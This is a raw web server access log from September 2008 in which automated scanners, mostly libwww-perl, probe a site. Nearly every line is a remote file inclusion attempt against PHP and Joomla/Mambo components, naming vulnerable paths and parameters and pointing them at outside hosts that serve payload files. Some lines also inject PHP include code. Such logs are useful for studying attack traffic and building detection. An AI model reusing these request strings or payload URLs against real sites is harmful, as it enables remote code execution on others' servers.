67.18.107.66 - - [06/Sep/2008:23:03:02 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.18.107.66 - - [06/Sep/2008:23:03:03 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.18.107.66 - - [06/Sep/2008:23:03:04 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
200.14.46.18 - - [06/Sep/2008:23:04:08 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [06/Sep/2008:23:04:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [06/Sep/2008:23:04:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
74.6.22.166 - - [06/Sep/2008:23:12:46 -0700] "GET /logs/?N=D HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "theanimalnetwork.net"
64.15.129.168 - - [06/Sep/2008:23:23:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "theanimalnetwork.net"
64.15.129.168 - - [06/Sep/2008:23:23:00 -0700] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "theanimalnetwork.net"
203.22.204.92 - - [06/Sep/2008:23:32:02 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.promislovik.ru/forum/team.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "theanimalnetwork.net"
203.22.204.92 - - [06/Sep/2008:23:33:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promislovik.ru/forum/team.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "theanimalnetwork.net"
58.26.163.11 - - [06/Sep/2008:23:40:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://cuza-voda.go.ro/b?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "theanimalnetwork.net"
85.17.6.7 - - [06/Sep/2008:23:43:05 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
85.17.6.7 - - [06/Sep/2008:23:43:05 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
85.17.6.7 - - [06/Sep/2008:23:43:05 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
62.141.36.238 - - [06/Sep/2008:23:47:20 -0700] "GET /logs/errors.php?error=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
62.141.36.238 - - [06/Sep/2008:23:47:20 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "theanimalnetwork.net"
62.141.36.238 - - [06/Sep/2008:23:47:21 -0700] "GET /errors.php?error=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
62.141.36.238 - - [06/Sep/2008:23:47:21 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "theanimalnetwork.net"
85.17.6.7 - - [06/Sep/2008:23:50:21 -0700] "GET /logs/access_080724.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
74.200.202.37 - - [06/Sep/2008:23:54:13 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [06/Sep/2008:23:54:13 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
74.200.202.37 - - [06/Sep/2008:23:54:13 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
87.248.163.41 - - [06/Sep/2008:23:59:16 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
209.172.33.53 - - [06/Sep/2008:23:59:48 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
209.172.33.53 - - [06/Sep/2008:23:59:48 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
209.172.33.53 - - [06/Sep/2008:23:59:49 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
190.24.147.187 - - [07/Sep/2008:00:00:57 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
190.24.147.187 - - [07/Sep/2008:00:00:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
190.24.147.187 - - [07/Sep/2008:00:00:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.248.163.41 - - [07/Sep/2008:00:02:17 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.248.163.41 - - [07/Sep/2008:00:02:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.248.163.41 - - [07/Sep/2008:00:02:17 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:04:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
209.172.33.53 - - [07/Sep/2008:00:04:31 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "theanimalnetwork.net"
190.24.147.187 - - [07/Sep/2008:00:04:52 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
67.19.87.58 - - [07/Sep/2008:00:04:56 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
67.19.87.58 - - [07/Sep/2008:00:04:56 -0700] "GET //components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
67.19.87.58 - - [07/Sep/2008:00:04:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:06:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
87.248.163.41 - - [07/Sep/2008:00:06:59 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
67.19.87.58 - - [07/Sep/2008:00:08:50 -0700] "GET /logs/access_080724.log//components/com_flyspray/startdown.php?file=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:10:39 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:10:39 -0700] "GET ///vwar/backup/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:10:40 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:12:17 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:12:17 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:13:51 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:13:51 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:49 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:49 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:49 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:53 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:54 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:15:54 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:00:17:02 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:00:17:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
72.55.156.116 - - [07/Sep/2008:00:17:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rock.ge/images/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:17:29 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:17:29 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:17:52 -0700] "GET /errors.php?error=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
65.254.41.130 - - [07/Sep/2008:00:17:53 -0700] "GET /logs/errors.php?error=http://www.lamarguerite.ca/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:06 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:06 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:06 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:12 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:12 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:40 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:40 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:40 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:56 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:56 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:22:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:24:08 -0700] "GET /logs/access_080724.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:24:08 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:24:09 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:11 -0700] "GET /logs/access_080722.log/e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:12 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:12 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:18 -0700] "GET /logs/access_080722.log/e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:18 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
72.82.228.83 - - [07/Sep/2008:00:24:18 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:00:24:41 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:25:31 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:25:32 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:00:25:33 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
88.84.157.127 - - [07/Sep/2008:00:28:05 -0700] "GET /logs/access_080729.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:29:25 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
216.226.139.125 - - [07/Sep/2008:00:29:31 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/dd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:00:30:52 -0700] "GET /bughttp://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
66.103.128.44 - - [07/Sep/2008:00:30:53 -0700] "GET /logs/bughttp://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:00:34:15 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:00:34:19 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:00:34:23 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
217.128.122.28 - - [07/Sep/2008:00:34:23 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ballettschule-tulln.at/htaccess/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:00:34:32 -0700] "GET /logs/access_080724.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
201.6.118.215 - - [07/Sep/2008:00:34:48 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://66.7.207.244/~vivafeli/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:00:36:00 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:00:36:00 -0700] "GET /logs/access.log%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:00:36:00 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:00:36:08 -0700] "GET /logs/access_080723.log%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
67.18.107.66 - - [07/Sep/2008:00:36:19 -0700] "GET /logs/access_080729.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
151.11.24.250 - - [07/Sep/2008:00:41:50 -0700] "GET /logs/access_080723.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:46:31 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:46:34 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
200.14.46.18 - - [07/Sep/2008:00:46:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ozwebfx.com/articledirectory/demonstration/backup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
66.7.208.173 - - [07/Sep/2008:00:47:10 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.der-blaue-reiter.de//contenido/images/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "theanimalnetwork.net"
